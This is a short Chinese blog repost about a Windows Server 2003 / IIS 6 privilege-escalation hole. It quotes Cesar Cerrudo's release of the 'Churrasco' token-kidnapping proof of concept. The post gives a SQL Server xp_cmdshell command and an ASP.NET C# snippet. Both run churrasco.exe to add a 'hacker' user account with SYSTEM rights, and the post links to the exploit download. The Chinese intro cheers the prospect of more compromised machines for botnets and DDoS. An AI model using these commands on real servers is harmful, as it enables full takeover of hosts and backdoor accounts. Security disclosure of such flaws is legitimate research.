zoukankan      html  css  js  c++  java
  • iis6+asp.net服务器致命漏洞

    前天同事发现了这个漏洞,今天我又在朋友的空间测试了下,确实可以运行一切命令,


    至今为止,MS没有出补丁,估计中国又增加成千上万的肉鸡了。DDOS又要更猛了.

    It has been a long time since Token Kidnapping presentation (http://
    www.argeniss.com/research/TokenKidnapping.pdf) was published so I
    decided to release a PoC exploit for Win2k3 that alows to execute code
    under SYSTEM account.

    Basically if you can run code under any service in Win2k3 then you can
    own Windows, this is because Windows services accounts can
    impersonate.
    Other process (not services) that can impersonate are IIS 6 worker
    processes so if you can run code from an ASP .NET or classic ASP web
    application then you can own Windows too. If you provide shared
    hosting services then I would recomend to not allow users to run this
    kind of code from ASP.


    -SQL Server is a nice target for the exploit if you are a DBA and want
    to own Windows:

    exec xp_cmdshell 'churrasco "net user /add hacker"'


    -Exploiting IIS 6 with ASP .NET :
    ...
    System.Diagnostics.Process myP = new System.Diagnostics.Process();
    myP.StartInfo.

    RedirectStandardOutput = true;
    myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
    myP.StartInfo.UseShellExecute = false;
    myP.StartInfo.Arguments= " \"net user /add hacker\" ";
    myP.Start();
    string output = myP.StandardOutput.ReadToEnd();
    Response.Write(output);
    ...


    You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

    Enjoy.
     Posted by Cesar Cerrudo at 4:10 PM
  • 相关阅读:
    统计创建对象个数
    动手动脑
    开学第一周心得
    放假第五周总结
    放假第四周总结
    第一周总结
    04-异常处理-动手动脑
    03-继承与多态-动手动脑
    02-类和对象-跟踪类对象创建个数
    02-类和对象-动手动脑
  • 原文地址:https://www.cnblogs.com/LCX/p/1366374.html
Copyright © 2011-2022 走看看